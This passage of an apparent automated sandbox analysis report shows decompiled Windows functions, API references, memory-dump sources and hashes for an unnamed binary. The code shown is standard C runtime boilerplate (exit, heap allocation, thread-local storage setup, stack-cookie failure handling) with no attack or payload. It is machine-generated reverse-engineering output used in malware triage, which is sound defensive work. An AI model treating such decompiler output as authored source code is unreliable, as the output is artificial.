                                                                                                            • Instruction Fuzzy Hash: 92E04F30A84300B7D664E7F09D4FF1B36A57711706F100800F605E50E1C7F854418B65
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00A32C38, Relevance: 3.0, APIs: 2, Instructions: 8COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E00A32C38(int _a4) {

				E00A32C0D(_a4);
				ExitProcess(_a4);
			}



                                                                                                            0x00a32c40
                                                                                                            0x00a32c49

                                                                                                            APIs
                                                                                                            • ___crtCorExitProcess.LIBCMT ref: 00A32C40
                                                                                                              • Part of subcall function 00A32C0D: GetModuleHandleW.KERNEL32(mscoree.dll,?,00A32C45,00000000,?,00A33432,000000FF,0000001E,00000001,00000000,00000000,?,00A3484E,00000000,00000001,00000000), ref: 00A32C17
                                                                                                              • Part of subcall function 00A32C0D: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00A32C27
                                                                                                            • ExitProcess.KERNEL32 ref: 00A32C49
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.199966421.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.199961685.0000000000A30000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000001.00000002.199974203.0000000000A39000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000001.00000002.199979711.0000000000A3D000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000001.00000002.200014509.0000000000A3F000.00000002.00020000.sdmp Download File
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                                                            • String ID:
                                                                                                            • API String ID: 2427264223-0
                                                                                                            • Opcode ID: 08fd2e21e45ef6de31c63db3382eec9c3f82083c394db006f679721884149c31
                                                                                                            • Instruction ID: be03d589867a3ca11d6f6c602fc507ebf2da42cf1e4f3c942c9f792585d44e84
                                                                                                            • Opcode Fuzzy Hash: 08fd2e21e45ef6de31c63db3382eec9c3f82083c394db006f679721884149c31
                                                                                                            • Instruction Fuzzy Hash: 00B09231000148BBCB052F52DE0AD8E7F2AEB813A0B108020F81809031DFB2ED92DEC0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00A365CB, Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 86%
                                                                                                            			E00A365CB(signed int _a4, signed int _a8, long _a12) {
				void* _t10;
				long _t11;
				long _t12;
				signed int _t13;
				signed int _t17;
				long _t19;
				long _t24;

				_t17 = _a4;
				if(_t17 == 0) {
					L3:
					_t24 = _t17 * _a8;
					__eflags = _t24;
					if(_t24 == 0) {
						_t24 = _t24 + 1;
						__eflags = _t24;
					}
					goto L5;
					L6:
					_t10 = RtlAllocateHeap( *0xa3e8c0, 8, _t24); // executed
					__eflags = 0;
					if(0 == 0) {
						goto L7;
					}
					L14:
					return _t10;
					goto L15;
					L7:
					__eflags =  *0xa3e8c4;
					if( *0xa3e8c4 == 0) {
						_t19 = _a12;
						__eflags = _t19;
						if(_t19 != 0) {
							 *_t19 = 0xc;
						}
					} else {
						_t11 = E00A33D86(_t10, _t24);
						__eflags = _t11;
						if(_t11 != 0) {
							L5:
							_t10 = 0;
							__eflags = _t24 - 0xffffffe0;
							if(_t24 > 0xffffffe0) {
								goto L7;
							} else {
								goto L6;
							}
						} else {
							_t12 = _a12;
							__eflags = _t12;
							if(_t12 != 0) {
								 *_t12 = 0xc;
							}
							_t10 = 0;
						}
					}
					goto L14;
				} else {
					_t13 = 0xffffffe0;
					_t27 = _t13 / _t17 - _a8;
					if(_t13 / _t17 >= _a8) {
						goto L3;
					} else {
						 *((intOrPtr*)(E00A34264(_t27))) = 0xc;
						return 0;
					}
				}
				L15:
			}










                                                                                                            0x00a365d0
                                                                                                            0x00a365d5
                                                                                                            0x00a365f2
                                                                                                            0x00a365f7
                                                                                                            0x00a365f9
                                                                                                            0x00a365fb
                                                                                                            0x00a365fd
                                                                                                            0x00a365fd
                                                                                                            0x00a365fd
                                                                                                            0x00000000
                                                                                                            0x00a36605
                                                                                                            0x00a3660e
                                                                                                            0x00a36614
                                                                                                            0x00a36616
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00a3664a
                                                                                                            0x00a3664c
                                                                                                            0x00000000
                                                                                                            0x00a36618
                                                                                                            0x00a36618
                                                                                                            0x00a3661f
                                                                                                            0x00a3663d
                                                                                                            0x00a36640
                                                                                                            0x00a36642
                                                                                                            0x00a36644
                                                                                                            0x00a36644
                                                                                                            0x00a36621
                                                                                                            0x00a36622
                                                                                                            0x00a36628
                                                                                                            0x00a3662a
                                                                                                            0x00a365fe
                                                                                                            0x00a365fe
                                                                                                            0x00a36600
                                                                                                            0x00a36603
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00a3662c
                                                                                                            0x00a3662c
                                                                                                            0x00a3662f
                                                                                                            0x00a36631
                                                                                                            0x00a36633
                                                                                                            0x00a36633
                                                                                                            0x00a36639
                                                                                                            0x00a36639
                                                                                                            0x00a3662a
                                                                                                            0x00000000
                                                                                                            0x00a365d7
                                                                                                            0x00a365db
                                                                                                            0x00a365de
                                                                                                            0x00a365e1
                                                                                                            0x00000000
                                                                                                            0x00a365e3
                                                                                                            0x00a365e8
                                                                                                            0x00a365f1
                                                                                                            0x00a365f1
                                                                                                            0x00a365e1
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00A34898,00000000,?,00000000,00000000,00000000,?,00A33F10,00000001,00000214), ref: 00A3660E
                                                                                                              • Part of subcall function 00A34264: __getptd_noexit.LIBCMT ref: 00A34264
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.199966421.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.199961685.0000000000A30000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000001.00000002.199974203.0000000000A39000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000001.00000002.199979711.0000000000A3D000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000001.00000002.200014509.0000000000A3F000.00000002.00020000.sdmp Download File
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AllocateHeap__getptd_noexit
                                                                                                            • String ID:
                                                                                                            • API String ID: 328603210-0
                                                                                                            • Opcode ID: 418da5adc2131fb527aa776fa09e5ac2822440f41a90ec37be13e6b90e9f723f
                                                                                                            • Instruction ID: 4836b79293768bfab188c873b7f56a48d949084ca3e14dfdb6cbd4ed3410093b
                                                                                                            • Opcode Fuzzy Hash: 418da5adc2131fb527aa776fa09e5ac2822440f41a90ec37be13e6b90e9f723f
                                                                                                            • Instruction Fuzzy Hash: D501D431201215FBEB29DF65DC16B673394AB817A0F00C63AF816CB1E4D7B0DC01C650
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00A32E90, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 25%
                                                                                                            			E00A32E90(intOrPtr _a4) {
				void* __ebp;
				void* _t2;
				void* _t3;
				void* _t4;
				void* _t5;
				void* _t8;

				_push(0);
				_push(0);
				_push(_a4);
				_t2 = E00A32D50(_t3, _t4, _t5, _t8); // executed
				return _t2;
			}









                                                                                                            0x00a32e95
                                                                                                            0x00a32e97
                                                                                                            0x00a32e99
                                                                                                            0x00a32e9c
                                                                                                            0x00a32ea5

                                                                                                            APIs
                                                                                                            • _doexit.LIBCMT ref: 00A32E9C
                                                                                                              • Part of subcall function 00A32D50: __lock.LIBCMT ref: 00A32D5E
                                                                                                              • Part of subcall function 00A32D50: DecodePointer.KERNEL32(00A3B5D8,00000020,00A32EB7,00000000,00000001,00000000,?,00A32EF7,000000FF,?,00A33919,00000011,00000000,?,00A33E7B,0000000D), ref: 00A32D9A
                                                                                                              • Part of subcall function 00A32D50: DecodePointer.KERNEL32(?,00A32EF7,000000FF,?,00A33919,00000011,00000000,?,00A33E7B,0000000D), ref: 00A32DAB
                                                                                                              • Part of subcall function 00A32D50: DecodePointer.KERNEL32(-00000004,?,00A32EF7,000000FF,?,00A33919,00000011,00000000,?,00A33E7B,0000000D), ref: 00A32DD1
                                                                                                              • Part of subcall function 00A32D50: DecodePointer.KERNEL32(?,00A32EF7,000000FF,?,00A33919,00000011,00000000,?,00A33E7B,0000000D), ref: 00A32DE4
                                                                                                              • Part of subcall function 00A32D50: DecodePointer.KERNEL32(?,00A32EF7,000000FF,?,00A33919,00000011,00000000,?,00A33E7B,0000000D), ref: 00A32DEE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.199966421.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.199961685.0000000000A30000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000001.00000002.199974203.0000000000A39000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000001.00000002.199979711.0000000000A3D000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000001.00000002.200014509.0000000000A3F000.00000002.00020000.sdmp Download File
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: DecodePointer$__lock_doexit
                                                                                                            • String ID:
                                                                                                            • API String ID: 3343572566-0
                                                                                                            • Opcode ID: b7f9ddcf0c01e83a82a0f1c6c29853ea6c7db7599a0eb0d3eddd439c3244ce42
                                                                                                            • Instruction ID: 91a8af19b96850bcefb9d18c0690b258ddad6f0c70d3639b7fbd0fbb61643ae6
                                                                                                            • Opcode Fuzzy Hash: b7f9ddcf0c01e83a82a0f1c6c29853ea6c7db7599a0eb0d3eddd439c3244ce42
                                                                                                            • Instruction Fuzzy Hash: DDB0923258020833DA212542BC03F063A0987C0BA4E250020BA0C191A2AAA2A9628189
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00A33DAE, Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlEncodePointer.NTDLL(00000000,00A36286,00A3E188,00000314,00000000,?,?,?,?,?,00A34792,00A3E188,Microsoft Visual C++ Runtime Library,00012010), ref: 00A33DB0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.199966421.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.199961685.0000000000A30000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000001.00000002.199974203.0000000000A39000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000001.00000002.199979711.0000000000A3D000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000001.00000002.200014509.0000000000A3F000.00000002.00020000.sdmp Download File
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: EncodePointer
                                                                                                            • String ID:
                                                                                                            • API String ID: 2118026453-0
                                                                                                            • Opcode ID: d5a51aade878ea0ae380219384c34cf3cfa090dc49b212c4d3542ebf7c0ad3c2
                                                                                                            • Instruction ID: 6ef8e26dfb9d7dbbd09656e88ac4e5f81dfd7ead2c372431571065e31aa8a4e2
                                                                                                            • Opcode Fuzzy Hash: d5a51aade878ea0ae380219384c34cf3cfa090dc49b212c4d3542ebf7c0ad3c2
                                                                                                            • Instruction Fuzzy Hash:
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Non-executed Functions

                                                                                                            Function 00A32701, Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 85%
                                                                                                            			E00A32701(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0xa3d07c; // 0xa189a5e1
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0xa3ddd8 = _t6;
				 *0xa3ddd4 = _t22;
				 *0xa3ddd0 = _t25;
				 *0xa3ddcc = _t21;
				 *0xa3ddc8 = _t27;
				 *0xa3ddc4 = _t26;
				 *0xa3ddf0 = ss;
				 *0xa3dde4 = cs;
				 *0xa3ddc0 = ds;
				 *0xa3ddbc = es;
				 *0xa3ddb8 = fs;
				 *0xa3ddb4 = gs;
				asm("pushfd");
				_pop( *0xa3dde8);
				 *0xa3dddc =  *_t31;
				 *0xa3dde0 = _v0;
				 *0xa3ddec =  &_a4;
				 *0xa3dd28 = 0x10001;
				_t11 =  *0xa3dde0; // 0x0
				 *0xa3dcdc = _t11;
				 *0xa3dcd0 = 0xc0000409;
				 *0xa3dcd4 = 1;
				_t12 =  *0xa3d07c; // 0xa189a5e1
				_v812 = _t12;
				_t13 =  *0xa3d080; // 0x5e765a1e
				_v808 = _t13;
				 *0xa3dd20 = IsDebuggerPresent();
				_push(1);
				E00A3520E(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0xa3922c);
				if( *0xa3dd20 == 0) {
					_push(1);
					E00A3520E(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}



















                                                                                                            0x00a32701
                                                                                                            0x00a32701
                                                                                                            0x00a32701
                                                                                                            0x00a32701
                                                                                                            0x00a32701
                                                                                                            0x00a32701
                                                                                                            0x00a32701
                                                                                                            0x00a32707
                                                                                                            0x00a32709
                                                                                                            0x00a32709
                                                                                                            0x00a332a9
                                                                                                            0x00a332ae
                                                                                                            0x00a332b4
                                                                                                            0x00a332ba
                                                                                                            0x00a332c0
                                                                                                            0x00a332c6
                                                                                                            0x00a332cc
                                                                                                            0x00a332d3
                                                                                                            0x00a332da
                                                                                                            0x00a332e1
                                                                                                            0x00a332e8
                                                                                                            0x00a332ef
                                                                                                            0x00a332f6
                                                                                                            0x00a332f7
                                                                                                            0x00a33300
                                                                                                            0x00a33308
                                                                                                            0x00a33310
                                                                                                            0x00a3331b
                                                                                                            0x00a33325
                                                                                                            0x00a3332a
                                                                                                            0x00a3332f
                                                                                                            0x00a33339
                                                                                                            0x00a33343
                                                                                                            0x00a33348
                                                                                                            0x00a3334e
                                                                                                            0x00a33353
                                                                                                            0x00a3335f
                                                                                                            0x00a33364
                                                                                                            0x00a33366
                                                                                                            0x00a3336e
                                                                                                            0x00a33379
                                                                                                            0x00a33386
                                                                                                            0x00a33388
                                                                                                            0x00a3338a
                                                                                                            0x00a3338f
                                                                                                            0x00a333a3

                                                                                                            APIs
                                                                                                            • IsDebuggerPresent.KERNEL32 ref: 00A33359
                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00A3336E
                                                                                                            • UnhandledExceptionFilter.KERNEL32(00A3922C), ref: 00A33379
                                                                                                            • GetCurrentProcess.KERNEL32(C0000409), ref: 00A33395
                                                                                                            • TerminateProcess.KERNEL32(00000000), ref: 00A3339C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.199966421.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.199961685.0000000000A30000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000001.00000002.199974203.0000000000A39000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000001.00000002.199979711.0000000000A3D000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000001.00000002.200014509.0000000000A3F000.00000002.00020000.sdmp Download File
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                            • String ID:
                                                                                                            • API String ID: 2579439406-0
                                                                                                            • Opcode ID: 21a0f396c1928f7740c8950c90544f383a83b610f2474532d0ec3d0bb1f38cef
                                                                                                            • Instruction ID: a286bc1c8da6f82438b4c8a929b09aa1e077d767a939a1260463cc233e4cbeaf
                                                                                                            • Opcode Fuzzy Hash: 21a0f396c1928f7740c8950c90544f383a83b610f2474532d0ec3d0bb1f38cef
                                                                                                            • Instruction Fuzzy Hash: 6B21B8B4806304DFDB44DFE9FD48A957BB8FB48388F00502AF90987260E7B09992CF15
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00A34991, Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E00A34991() {

				SetUnhandledExceptionFilter(E00A3494F);
				return 0;
			}



                                                                                                            0x00a34996
                                                                                                            0x00a3499e

                                                                                                            APIs
                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_0000494F), ref: 00A34996
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.199966421.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.199961685.0000000000A30000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000001.00000002.199974203.0000000000A39000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000001.00000002.199979711.0000000000A3D000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000001.00000002.200014509.0000000000A3F000.00000002.00020000.sdmp Download File
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                            • String ID:
                                                                                                            • API String ID: 3192549508-0
                                                                                                            • Opcode ID: 49314069b211a58095dd99997b616dbf20929525b59f28683fa17e74a68cfdea
                                                                                                            • Instruction ID: fe58ac8cc7061b7873373b380bc3c1d00e20bcf123352fa180ab6a567e5278d7
                                                                                                            • Opcode Fuzzy Hash: 49314069b211a58095dd99997b616dbf20929525b59f28683fa17e74a68cfdea
                                                                                                            • Instruction Fuzzy Hash: 2B9002B025114156468497B49C4B6572594AA4D622B4118607415C5158DB9050459551
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00A340A7, Relevance: 42.1, APIs: 19, Strings: 5, Instructions: 109libraryloadermemoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 62%
                                                                                                            			E00A340A7(void* __ebx) {
				void* __edi;
				void* __esi;
				_Unknown_base(*)()* _t7;
				long _t10;
				void* _t11;
				int _t12;
				void* _t14;
				void* _t15;
				void* _t16;
				void* _t18;
				intOrPtr _t21;
				long _t26;
				void* _t30;
				struct HINSTANCE__* _t35;
				intOrPtr* _t36;
				void* _t39;
				intOrPtr* _t41;
				void* _t42;

				_t30 = __ebx;
				_t35 = GetModuleHandleW(L"KERNEL32.DLL");
				if(_t35 != 0) {
					 *0xa3e178 = GetProcAddress(_t35, "FlsAlloc");
					 *0xa3e17c = GetProcAddress(_t35, "FlsGetValue");
					 *0xa3e180 = GetProcAddress(_t35, "FlsSetValue");
					_t7 = GetProcAddress(_t35, "FlsFree");
					__eflags =  *0xa3e178;
					_t39 = TlsSetValue;
					 *0xa3e184 = _t7;
					if( *0xa3e178 == 0) {
						L6:
						 *0xa3e17c = TlsGetValue;
						 *0xa3e178 = E00A33DB7;
						 *0xa3e180 = _t39;
						 *0xa3e184 = TlsFree;
					} else {
						__eflags =  *0xa3e17c;
						if( *0xa3e17c == 0) {
							goto L6;
						} else {
							__eflags =  *0xa3e180;
							if( *0xa3e180 == 0) {
								goto L6;
							} else {
								__eflags = _t7;
								if(_t7 == 0) {
									goto L6;
								}
							}
						}
					}
					_t10 = TlsAlloc();
					 *0xa3d1b4 = _t10;
					__eflags = _t10 - 0xffffffff;
					if(_t10 == 0xffffffff) {
						L15:
						_t11 = 0;
						__eflags = 0;
					} else {
						_t12 = TlsSetValue(_t10,  *0xa3e17c);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L15;
						} else {
							E00A32C62();
							_t41 = __imp__EncodePointer;
							_t14 =  *_t41( *0xa3e178);
							 *0xa3e178 = _t14;
							_t15 =  *_t41( *0xa3e17c);
							 *0xa3e17c = _t15;
							_t16 =  *_t41( *0xa3e180);
							 *0xa3e180 = _t16;
							 *0xa3e184 =  *_t41( *0xa3e184);
							_t18 = E00A33778();
							__eflags = _t18;
							if(_t18 == 0) {
								L14:
								E00A33DF4();
								goto L15;
							} else {
								_t36 = __imp__DecodePointer;
								_t21 =  *((intOrPtr*)( *_t36()))( *0xa3e178, E00A33F78);
								 *0xa3d1b0 = _t21;
								__eflags = _t21 - 0xffffffff;
								if(_t21 == 0xffffffff) {
									goto L14;
								} else {
									_t42 = E00A34882(1, 0x214);
									__eflags = _t42;
									if(_t42 == 0) {
										goto L14;
									} else {
										__eflags =  *((intOrPtr*)( *_t36()))( *0xa3e180,  *0xa3d1b0, _t42);
										if(__eflags == 0) {
											goto L14;
										} else {
											_push(0);
											_push(_t42);
											E00A33E31(_t30, _t36, _t42, __eflags);
											_t26 = GetCurrentThreadId();
											 *(_t42 + 4) =  *(_t42 + 4) | 0xffffffff;
											 *_t42 = _t26;
											_t11 = 1;
										}
									}
								}
							}
						}
					}
					return _t11;
				} else {
					E00A33DF4();
					return 0;
				}
			}





















                                                                                                            0x00a340a7
                                                                                                            0x00a340b5
                                                                                                            0x00a340b9
                                                                                                            0x00a340d9
                                                                                                            0x00a340e6
                                                                                                            0x00a340f3
                                                                                                            0x00a340f8
                                                                                                            0x00a340fa
                                                                                                            0x00a34101
                                                                                                            0x00a34107
                                                                                                            0x00a3410c
                                                                                                            0x00a34124
                                                                                                            0x00a34129
                                                                                                            0x00a34133
                                                                                                            0x00a3413d
                                                                                                            0x00a34143
                                                                                                            0x00a3410e
                                                                                                            0x00a3410e
                                                                                                            0x00a34115
                                                                                                            0x00000000
                                                                                                            0x00a34117
                                                                                                            0x00a34117
                                                                                                            0x00a3411e
                                                                                                            0x00000000
                                                                                                            0x00a34120
                                                                                                            0x00a34120
                                                                                                            0x00a34122
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00a34122
                                                                                                            0x00a3411e
                                                                                                            0x00a34115
                                                                                                            0x00a34148
                                                                                                            0x00a3414e
                                                                                                            0x00a34153
                                                                                                            0x00a34156
                                                                                                            0x00a3421d
                                                                                                            0x00a3421d
                                                                                                            0x00a3421d
                                                                                                            0x00a3415c
                                                                                                            0x00a34163
                                                                                                            0x00a34165
                                                                                                            0x00a34167
                                                                                                            0x00000000
                                                                                                            0x00a3416d
                                                                                                            0x00a3416d
                                                                                                            0x00a34178
                                                                                                            0x00a3417e
                                                                                                            0x00a34186
                                                                                                            0x00a3418b
                                                                                                            0x00a34193
                                                                                                            0x00a34198
                                                                                                            0x00a341a0
                                                                                                            0x00a341a7
                                                                                                            0x00a341ac
                                                                                                            0x00a341b1
                                                                                                            0x00a341b3
                                                                                                            0x00a34218
                                                                                                            0x00a34218
                                                                                                            0x00000000
                                                                                                            0x00a341b5
                                                                                                            0x00a341b5
                                                                                                            0x00a341c8
                                                                                                            0x00a341ca
                                                                                                            0x00a341cf
                                                                                                            0x00a341d2
                                                                                                            0x00000000
                                                                                                            0x00a341d4
                                                                                                            0x00a341e0
                                                                                                            0x00a341e4
                                                                                                            0x00a341e6
                                                                                                            0x00000000
                                                                                                            0x00a341e8
                                                                                                            0x00a341f9
                                                                                                            0x00a341fb
                                                                                                            0x00000000
                                                                                                            0x00a341fd
                                                                                                            0x00a341fd
                                                                                                            0x00a341ff
                                                                                                            0x00a34200
                                                                                                            0x00a34207
                                                                                                            0x00a3420d
                                                                                                            0x00a34211
                                                                                                            0x00a34215
                                                                                                            0x00a34215
                                                                                                            0x00a341fb
                                                                                                            0x00a341e6
                                                                                                            0x00a341d2
                                                                                                            0x00a341b3
                                                                                                            0x00a34167
                                                                                                            0x00a34221
                                                                                                            0x00a340bb
                                                                                                            0x00a340bb
                                                                                                            0x00a340c3
                                                                                                            0x00a340c3

                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,00A33165), ref: 00A340AF
                                                                                                            • __mtterm.LIBCMT ref: 00A340BB
                                                                                                              • Part of subcall function 00A33DF4: DecodePointer.KERNEL32(00000005,00A3421D,?,00A33165), ref: 00A33E05
                                                                                                              • Part of subcall function 00A33DF4: TlsFree.KERNEL32(00000019,00A3421D,?,00A33165), ref: 00A33E1F
                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00A340D1
                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00A340DE
                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00A340EB
                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00A340F8
                                                                                                            • TlsAlloc.KERNEL32(?,00A33165), ref: 00A34148
                                                                                                            • TlsSetValue.KERNEL32(00000000,?,00A33165), ref: 00A34163
                                                                                                            • __init_pointers.LIBCMT ref: 00A3416D
                                                                                                            • EncodePointer.KERNEL32(?,00A33165), ref: 00A3417E
                                                                                                            • EncodePointer.KERNEL32(?,00A33165), ref: 00A3418B
                                                                                                            • EncodePointer.KERNEL32(?,00A33165), ref: 00A34198
                                                                                                            • EncodePointer.KERNEL32(?,00A33165), ref: 00A341A5
                                                                                                            • DecodePointer.KERNEL32(00A33F78,?,00A33165), ref: 00A341C6
                                                                                                            • __calloc_crt.LIBCMT ref: 00A341DB
                                                                                                            • DecodePointer.KERNEL32(00000000,?,00A33165), ref: 00A341F5
                                                                                                            • __initptd.LIBCMT ref: 00A34200
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00A34207
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.199966421.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.199961685.0000000000A30000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000001.00000002.199974203.0000000000A39000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000001.00000002.199979711.0000000000A3D000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000001.00000002.200014509.0000000000A3F000.00000002.00020000.sdmp Download File
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Pointer$AddressEncodeProc$Decode$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__initptd__mtterm
                                                                                                            • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                            • API String ID: 3732613303-3819984048
                                                                                                            • Opcode ID: 067f278c6ea6613a378af4e414612811136941b191809c819be8e9e898957390
                                                                                                            • Instruction ID: 3dcfba39df8ae71afd75d539080dcfd1209ec653bcaac0c4dc88c88be8a47018
                                                                                                            • Opcode Fuzzy Hash: 067f278c6ea6613a378af4e414612811136941b191809c819be8e9e898957390
                                                                                                            • Instruction Fuzzy Hash: 09314D31A44750ABEB11EBF4AC4969B7EA4AB6A760F100B26F814D32F0DBB49443DF50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00A3784D, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 23COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 66%
                                                                                                            			E00A3784D(void* __ecx, void* __edx, void* __esi, intOrPtr* _a4) {
				signed int _v8;
				void* __ebp;
				void* _t16;
				intOrPtr* _t19;
				void* _t23;
				void* _t26;

				_t27 = __esi;
				_t25 = __edx;
				_t32 =  *((intOrPtr*)( *_a4)) - 0xe0434352;
				if( *((intOrPtr*)( *_a4)) == 0xe0434352) {
					L8:
					__eflags =  *((intOrPtr*)(E00A33F5E(_t23, _t25, _t26, __eflags) + 0x90));
					if(__eflags > 0) {
						_t16 = E00A33F5E(_t23, _t25, _t26, __eflags);
						_t9 = _t16 + 0x90;
						 *_t9 =  *((intOrPtr*)(_t16 + 0x90)) - 1;
						__eflags =  *_t9;
					}
					goto L10;
				} else {
					__eflags = __eax - 0xe0434f4d;
					if(__eflags == 0) {
						goto L8;
					} else {
						__eflags = __eax - 0xe06d7363;
						if(__eflags != 0) {
							L10:
							__eflags = 0;
							return 0;
						} else {
							 *(E00A33F5E(__ebx, __edx, __edi, __eflags) + 0x90) =  *(__eax + 0x90) & 0x00000000;
							_push(8);
							_push(0xa3b678);
							E00A34440(_t23, _t26, __esi);
							_t19 =  *((intOrPtr*)(E00A33F5E(_t23, __edx, _t26, _t32) + 0x78));
							if(_t19 != 0) {
								_v8 = _v8 & 0x00000000;
								 *_t19();
								_v8 = 0xfffffffe;
							}
							return E00A34485(E00A35372(_t23, _t25, _t26, _t27));
						}
					}
				}
			}









                                                                                                            0x00a3784d
                                                                                                            0x00a3784d
                                                                                                            0x00a37859
                                                                                                            0x00a3785e
                                                                                                            0x00a3787f
                                                                                                            0x00a37884
                                                                                                            0x00a3788b
                                                                                                            0x00a3788d
                                                                                                            0x00a37892
                                                                                                            0x00a37892
                                                                                                            0x00a37892
                                                                                                            0x00a37892
                                                                                                            0x00000000
                                                                                                            0x00a37860
